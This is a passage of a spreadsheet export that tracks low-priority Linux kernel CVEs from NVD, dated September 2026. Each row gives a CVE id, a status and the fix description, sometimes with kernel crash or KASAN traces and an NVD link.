conn-&gt;sndbuf_desc from smc_conn_kill() under lock_sock(), so a link group
terminating while a socket waits there leaves the helper dereferencing
NULL, faulting out of close(). SIOCOUTQ reads the field by hand, and
smc_close_cancel_work() drops the lock across two cancel_*_sync() calls.
Sample the pointer once in the helper, report nothing prepared while it is
unset, and bound the ioctl the same way. The receive tasklet dereferences
the field directly in smc_cdc_msg_recv_action(), not through this helper;
1/2 is what keeps it from running that late.</t>
        </is>
      </c>
      <c r="S958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80984</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80988</t>
        </is>
      </c>
      <c r="D959" s="5" t="inlineStr"/>
      <c r="E959" s="5" t="inlineStr"/>
      <c r="F959" s="5" t="inlineStr"/>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I959" s="5" t="inlineStr"/>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr"/>
      <c r="L959" s="5" t="inlineStr"/>
      <c r="M959" s="5" t="inlineStr"/>
      <c r="N959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O959" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P959" s="5" t="inlineStr"/>
      <c r="Q959" s="5" t="inlineStr"/>
      <c r="R959" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NTB: ntb_transport: Fail TX enqueue when the QP link is down
Commit f195a1a6fe41 ("ntb: Drop packets when qp link is down") meant to
make ntb_transport_tx_enqueue() drop packets submitted while the QP link
is down, but it only returns 0 without consuming the packet. Zero means
success by this function's contract, so ntb_netdev reports NETDEV_TX_OK
and forgets the skb: nothing queued it, nothing frees it, and it leaks,
one skb for every transmit racing a link-down.
Return -ENOLINK instead, restoring the contract that a non-zero return
leaves the buffer owned by the caller. With the preceding patch,
ntb_netdev frees the skb on non-retryable enqueue failures and returns
NETDEV_TX_OK, so a packet racing with link-down is dropped without leaking
or entering a busy retry loop.</t>
        </is>
      </c>
      <c r="S959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80988</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80990</t>
        </is>
      </c>
      <c r="D960" s="5" t="inlineStr"/>
      <c r="E960" s="5" t="inlineStr"/>
      <c r="F960" s="5" t="inlineStr"/>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I960" s="5" t="inlineStr"/>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr"/>
      <c r="L960" s="5" t="inlineStr"/>
      <c r="M960" s="5" t="inlineStr"/>
      <c r="N960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O960" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P960" s="5" t="inlineStr"/>
      <c r="Q960" s="5" t="inlineStr"/>
      <c r="R960" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: thunderbolt: Release the Rx HopID that was handed out on mismatch
tb_xdomain_alloc_in_hopid() passes the wanted HopID to ida_alloc_range()
as the lower bound, so a taken id is not an error there: the allocator
returns the next free one above it. tbnet_connected_work() asks for the
peer's transmit path, treats any other id as a failure and returns
without releasing what it got, so that allocation stays live for the rest
of the XDomain connection with nothing left holding a reference to it.
Release the id when it is not the one we asked for, the same way the
error unwind at the end of the function releases the expected one.</t>
        </is>
      </c>
      <c r="S960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80990</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80993</t>
        </is>
      </c>
      <c r="D961" s="5" t="inlineStr"/>
      <c r="E961" s="5" t="inlineStr"/>
      <c r="F961" s="5" t="inlineStr"/>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I961" s="5" t="inlineStr"/>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr"/>
      <c r="L961" s="5" t="inlineStr"/>
      <c r="M961" s="5" t="inlineStr"/>
      <c r="N961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O961" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P961" s="5" t="inlineStr"/>
      <c r="Q961" s="5" t="inlineStr"/>
      <c r="R961" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: phylink: correctly validate returned PCS in phylink_inband_caps
In phylink_inband_caps(), the PCS returned by mac_select_pcs is only
checked if NULL but mac_select_pcs can also return an error pointer.
This can cause a kernel panic as phylink_pcs_inband_caps() only checks
if passed PCS is not NULL and directly dereference ops from the phylink_pcs
struct.
Use the IS_ERR_OR_NULL macro to address both case where the returned
PCS can be NULL or an error pointer and prevent a kernel panic.</t>
        </is>
      </c>
      <c r="S961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80993</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80996</t>
        </is>
      </c>
      <c r="D962" s="5" t="inlineStr"/>
      <c r="E962" s="5" t="inlineStr"/>
      <c r="F962" s="5" t="inlineStr"/>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I962" s="5" t="inlineStr"/>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr"/>
      <c r="L962" s="5" t="inlineStr"/>
      <c r="M962" s="5" t="inlineStr"/>
      <c r="N962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O962" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P962" s="5" t="inlineStr"/>
      <c r="Q962" s="5" t="inlineStr"/>
      <c r="R962" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: l2tp: do not propagate multicast notification errors
The tunnel create, tunnel modify, session create, and session modify
netlink handlers send multicast notifications through helpers that can fail
while allocating or encoding a message, or while multicasting it.
For tunnel and session create/modify, a notification is sent after the live
operation has completed. Returning a best-effort notification error as the
command result can therefore report failure for an operation that already
committed and can cause callers to retry and accumulate live objects.
Keep sending notifications for listener visibility, but do not propagate
their best-effort status as the command result. This also keeps the tunnel
modify command consistent with the other notification-only paths.</t>
        </is>
      </c>
      <c r="S962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80996</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80999</t>
        </is>
      </c>
      <c r="D963" s="5" t="inlineStr"/>
      <c r="E963" s="5" t="inlineStr"/>
      <c r="F963" s="5" t="inlineStr"/>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I963" s="5" t="inlineStr"/>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr"/>
      <c r="L963" s="5" t="inlineStr"/>
      <c r="M963" s="5" t="inlineStr"/>
      <c r="N963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O963" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P963" s="5" t="inlineStr"/>
      <c r="Q963" s="5" t="inlineStr"/>
      <c r="R963" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: realtek: use gpiod_set_value_cansleep for reset GPIO
rtl83xx_reset_assert() and rtl83xx_reset_deassert() are only called from
the probe path, which may sleep and is not timing-critical.  When the
reset GPIO is provided by a sleeping controller such as an I2C I/O
expander, gpiod_set_value() warns:
  WARNING: drivers/gpio/gpiolib.c:4030 at gpiod_set_value+0x44/0x80, CPU#1: kworker/u16:4/61
  Hardware name: B&amp;O MAP CA33 Rev f (UNKNOWN) (DT)
  Workqueue: events_unbound deferred_probe_work_func
  pc : gpiod_set_value+0x44/0x80
  lr : rtl83xx_probe+0x1d8/0x3a0
  Call trace:
   gpiod_set_value+0x44/0x80 (P)
   rtl83xx_probe+0x1d8/0x3a0
   realtek_mdio_probe+0x24/0xa0
   mdio_probe+0x38/0x78
   really_probe+0xc4/0x3e0
   __driver_probe_device+0x15c/0x1b8
   driver_probe_device+0xb4/0x120
   __device_attach_driver+0xb8/0x1a0
   bus_for_each_drv+0x88/0xf0
   __device_attach+0xa0/0x1d8
   device_initial_probe+0x54/0x68
   bus_probe_device+0x38/0xa0
   deferred_probe_work_func+0xb8/0x120
   process_one_work+0x184/0x4e8
   worker_thread+0x188/0x308
   kthread+0x130/0x150
   ret_from_fork+0x10/0x20
Switch both helpers to gpiod_set_value_cansleep() so such a reset GPIO can
be used without triggering the warning.
The reset GPIO has been driven with the non-sleeping gpiod_set_value()
since the driver was added in v4.19.  The call has since been refactored
across several files - from realtek-smi.c / realtek-mdio.c into the common
rtl83xx.c module and then into the rtl83xx_reset_assert() and
rtl83xx_reset_deassert() helpers (both in v6.9).  This patch therefore
applies as-is only to kernels that carry those helpers (v6.9+); older
stable kernels need the same gpiod_set_value_cansleep() conversion at the
corresponding open-coded call sites.</t>
        </is>
      </c>
      <c r="S963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80999</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81005</t>
        </is>
      </c>
      <c r="D964" s="5" t="inlineStr"/>
      <c r="E964" s="5" t="inlineStr"/>
      <c r="F964" s="5" t="inlineStr"/>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I964" s="5" t="inlineStr"/>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr"/>
      <c r="L964" s="5" t="inlineStr"/>
      <c r="M964" s="5" t="inlineStr"/>
      <c r="N964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O964" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P964" s="5" t="inlineStr"/>
      <c r="Q964" s="5" t="inlineStr"/>
      <c r="R964" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi: si: Fix NULL pointer dereference after failed registration
try_smi_init() allocates new_smi-&gt;si_sm and later calls
ipmi_register_smi_mod(), which maps to ipmi_add_smi().
During ipmi_add_smi(), the upper IPMI message handler obtains the
initial BMC device information through __bmc_get_device_id(). This can
fail if the BMC does not return a successful response to the Get Device
ID command.
When the BMC returns a nonzero completion code, the device-id helper
retries the command and eventually returns -EIO if the device ID still
cannot be fetched.
On this failure path, ipmi_add_smi() logs "Unable to get the device id"
and goes to out_err_started, where it invokes the lower driver's
shutdown callback. try_smi_init() then logs the returned registration
failure:
 ipmi_si IPI0001:00: IPMI message handler: Unable to get the device id: -5
 ipmi_si IPI0001:00: Unable to register device: error -5
For ipmi_si, the shutdown callback is shutdown_smi(), which cleans up
the SI state machine data, frees smi_info-&gt;si_sm, and sets
smi_info-&gt;si_sm and smi_info-&gt;intf to NULL.
However, intf-&gt;in_shutdown is not set on this failed-registration
rollback path. Therefore, the asynchronous redo_bmc_reg work item can
still retry BMC device-id probing after the lower driver has already
cleared its SI state machine data. In the observed case, that retry path
reached start_next_msg(), which passed the NULL smi_info-&gt;si_sm pointer
to the selected KCS state machine handler:
BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
Workqueue: events redo_bmc_reg [ipmi_msghandler]
RIP: start_kcs_transaction+0x2c/0x190 [ipmi_si]
Call Trace:
 start_next_msg+0x50/0x80 [ipmi_si]
 check_start_timer_thread.part.9+0x3b/0x50 [ipmi_si]
 sender+0x69/0x80 [ipmi_si]
 i_ipmi_request+0x2ac/0x9d0 [ipmi_msghandler]
 __get_device_id.isra.29+0xaa/0x180 [ipmi_msghandler]
 __bmc_get_device_id+0xef/0x950 [ipmi_msghandler]
 redo_bmc_reg+0x52/0x60 [ipmi_msghandler]
 process_one_work+0x1a7/0x360
Set intf-&gt;in_shutdown on the out_err_started path before invoking the
lower driver's shutdown callback. This prevents later redo_bmc_reg
retries from using an interface whose lower driver state has been
cleaned up, and applies the same shutdown state to other IPMI interfaces
as well.</t>
        </is>
      </c>
      <c r="S964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81005</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81009</t>
        </is>
      </c>
      <c r="D965" s="5" t="inlineStr"/>
      <c r="E965" s="5" t="inlineStr"/>
      <c r="F965" s="5" t="inlineStr"/>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I965" s="5" t="inlineStr"/>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr"/>
      <c r="L965" s="5" t="inlineStr"/>
      <c r="M965" s="5" t="inlineStr"/>
      <c r="N965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O965" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P965" s="5" t="inlineStr"/>
      <c r="Q965" s="5" t="inlineStr"/>
      <c r="R965" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring/query: cap user size passed to copy_struct_to_user
io_handle_query_entry() clamps hdr.size for the inbound copy_from_user()
but keeps the original user value as usize. copy_struct_to_user() uses
that usize and, when it is larger than the kernel result, clear_user()s
the trailing bytes.
As hdr.size is a __u32, a query can request nearly 4 GiB of zeroing,
including on the error path where res_size stays 0. The interface is
reachable without a ring via IORING_REGISTER_QUERY.
Reject sizes larger than PAGE_SIZE, as recommended for copy_struct_*
interfaces.</t>
        </is>
      </c>
      <c r="S965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81009</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81013</t>
        </is>
      </c>
      <c r="D966" s="5" t="inlineStr"/>
      <c r="E966" s="5" t="inlineStr"/>
      <c r="F966" s="5" t="inlineStr"/>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I966" s="5" t="inlineStr"/>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr"/>
      <c r="L966" s="5" t="inlineStr"/>
      <c r="M966" s="5" t="inlineStr"/>
      <c r="N966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O966" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P966" s="5" t="inlineStr"/>
      <c r="Q966" s="5" t="inlineStr"/>
      <c r="R966" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: fix heap OOB read on empty password write
validate_password_input() computes length = strlen(buf) and then
checks buf[length - 1] to strip a trailing newline, without checking
that length is nonzero first. Writing an empty string (a bare '\n')
to current_password or new_password gives length == 0, and
buf[length - 1] reads buf[-1], one byte before the heap allocation
holding the copied input.
KASAN confirms this directly:
  BUG: KASAN: slab-out-of-bounds in store_password_instance.constprop.0+0x223/0x2a0 [hp_bioscfg]
  Read of size 1 at addr ffff88811bd8da9f by task sh/13740
  ...
  store_password_instance.constprop.0+0x223/0x2a0 [hp_bioscfg]
  current_password_store+0x14/0x20 [hp_bioscfg]
  ...
  The buggy address is located 23 bytes to the right of
  allocated 8-byte region [ffff88811bd8da80, ffff88811bd8da88)
Reproduced identically via new_password_store. Execution continues
past the bad read (the garbage byte only affects whether "length" is
decremented by one), so the write completes and returns success; this
is a pure information read past the buffer, not a crash, but it is
still an out-of-bounds access KASAN correctly flags.
Fix by only checking buf[length - 1] when length is nonzero.</t>
        </is>
      </c>
      <c r="S966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81013</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81014</t>
        </is>
      </c>
      <c r="D967" s="5" t="inlineStr"/>
      <c r="E967" s="5" t="inlineStr"/>
      <c r="F967" s="5" t="inlineStr"/>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I967" s="5" t="inlineStr"/>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr"/>
      <c r="L967" s="5" t="inlineStr"/>
      <c r="M967" s="5" t="inlineStr"/>
      <c r="N967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O967" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P967" s="5" t="inlineStr"/>
      <c r="Q967" s="5" t="inlineStr"/>
      <c r="R967" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: fix heap OOB read in sk_store() and kek_store()
sk_store() and kek_store() strip a trailing newline from the sysfs
write before allocating the key buffer:
	length = count;
	if (buf[length - 1] == '\n')
		length--;
	bioscfg_drv.spm_data.signing_key = kmemdup(buf, length, GFP_KERNEL);
but then pass the original "count" (not "length") as the copy size to
hp_wmi_perform_query(), which memcpy()s that many bytes out of the
"length"-sized allocation, reading one byte past it whenever the write
ends in a newline, the normal case for a shell "echo" into sysfs.
KASAN confirms this directly:
  BUG: KASAN: slab-out-of-bounds in hp_wmi_perform_query+0x1e9/0x460 [hp_bioscfg]
  Read of size 28 at addr ffff88813c8e2b80 by task python3/16022
  ...
  sk_store+0xa7/0x240 [hp_bioscfg]
  kernfs_fop_write_iter+0x3e1/0x5d0
  ...
  The buggy address is located 0 bytes inside of
  allocated 27-byte region [ffff88813c8e2b80, ffff88813c8e2b9b)
Reproduced identically for kek_store, and at multiple write sizes
(28, 57, 201 bytes), each time reading exactly one byte past a
kmemdup() allocation one byte smaller than the write.
Fix by passing "length" instead of "count" to hp_wmi_perform_query()
in both functions.</t>
        </is>
      </c>
      <c r="S967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81014</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81018</t>
        </is>
      </c>
      <c r="D968" s="5" t="inlineStr"/>
      <c r="E968" s="5" t="inlineStr"/>
      <c r="F968" s="5" t="inlineStr"/>
      <c r="G968" s="5" t="inlineStr"/>
      <c r="H968" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I968" s="5" t="inlineStr"/>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr"/>
      <c r="L968" s="5" t="inlineStr"/>
      <c r="M968" s="5" t="inlineStr"/>
      <c r="N968" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O968" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P968" s="5" t="inlineStr"/>
      <c r="Q968" s="5" t="inlineStr"/>
      <c r="R968" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: think-lmi: Free system certificate signatures
Multi-certificate support also allows the system authentication object
to store -&gt;signature and -&gt;save_signature, which leak when the driver is
removed. Free the signatures to avoid leaking memory.</t>
        </is>
      </c>
      <c r="S968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81018</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87122</t>
        </is>
      </c>
      <c r="D969" s="5" t="inlineStr"/>
      <c r="E969" s="5" t="inlineStr"/>
      <c r="F969" s="5" t="inlineStr"/>
      <c r="G969" s="5" t="inlineStr"/>
      <c r="H969" s="5" t="inlineStr"/>
      <c r="I969" s="5" t="inlineStr"/>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr"/>
      <c r="L969" s="5" t="inlineStr"/>
      <c r="M969" s="5" t="inlineStr"/>
      <c r="N969" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O969" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P969" s="5" t="inlineStr"/>
      <c r="Q969" s="5" t="inlineStr"/>
      <c r="R969" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2026-85984. Reason: This candidate is a reservation duplicate of CVE-2026-85984. Notes: All CVE users should reference CVE-2026-85984 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.</t>
        </is>
      </c>
      <c r="S969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87122</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89437</t>
        </is>
      </c>
      <c r="D970" s="5" t="inlineStr"/>
      <c r="E970" s="5" t="inlineStr"/>
      <c r="F970" s="5" t="inlineStr"/>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I970" s="5" t="inlineStr"/>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr"/>
      <c r="L970" s="5" t="inlineStr"/>
      <c r="M970" s="5" t="inlineStr"/>
      <c r="N970" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O970" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P970" s="5" t="inlineStr"/>
      <c r="Q970" s="5" t="inlineStr"/>
      <c r="R970" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: int1092: Fix potential memory leak in sar_probe()
The memory allocated for device_mode_info in parse_package() called by
sar_get_data() is not freed in some of the error paths in sar_probe().
Fix that by converting to use device managed allocations.</t>
        </is>
      </c>
      <c r="S970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89437</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89438</t>
        </is>
      </c>
      <c r="D971" s="5" t="inlineStr"/>
      <c r="E971" s="5" t="inlineStr"/>
      <c r="F971" s="5" t="inlineStr"/>
      <c r="G971" s="5" t="inlineStr"/>
      <c r="H971" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I971" s="5" t="inlineStr"/>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr"/>
      <c r="L971" s="5" t="inlineStr"/>
      <c r="M971" s="5" t="inlineStr"/>
      <c r="N971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O971" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P971" s="5" t="inlineStr"/>
      <c r="Q971" s="5" t="inlineStr"/>
      <c r="R971" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: ISST: Validate logical CPU id and clos id
Validate max CLOS ID and logical CPU ID for core power feature.
Reject any clos level or logical CPU number greater than the
supported maximum. These are used to calculate MMIO offset.</t>
        </is>
      </c>
      <c r="S971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89438</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89439</t>
        </is>
      </c>
      <c r="D972" s="5" t="inlineStr"/>
      <c r="E972" s="5" t="inlineStr"/>
      <c r="F972" s="5" t="inlineStr"/>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I972" s="5" t="inlineStr"/>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr"/>
      <c r="L972" s="5" t="inlineStr"/>
      <c r="M972" s="5" t="inlineStr"/>
      <c r="N972" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O972" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P972" s="5" t="inlineStr"/>
      <c r="Q972" s="5" t="inlineStr"/>
      <c r="R972" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: ISST: Add a NULL check for sst_inst[]
To be consistent with other places, add a NULL check for failed socket
loading by checking isst_common.sst_inst[].</t>
        </is>
      </c>
      <c r="S972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89439</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89444</t>
        </is>
      </c>
      <c r="D973" s="5" t="inlineStr"/>
      <c r="E973" s="5" t="inlineStr"/>
      <c r="F973" s="5" t="inlineStr"/>
      <c r="G973" s="5" t="inlineStr"/>
      <c r="H973" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I973" s="5" t="inlineStr"/>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr"/>
      <c r="L973" s="5" t="inlineStr"/>
      <c r="M973" s="5" t="inlineStr"/>
      <c r="N973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O973" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
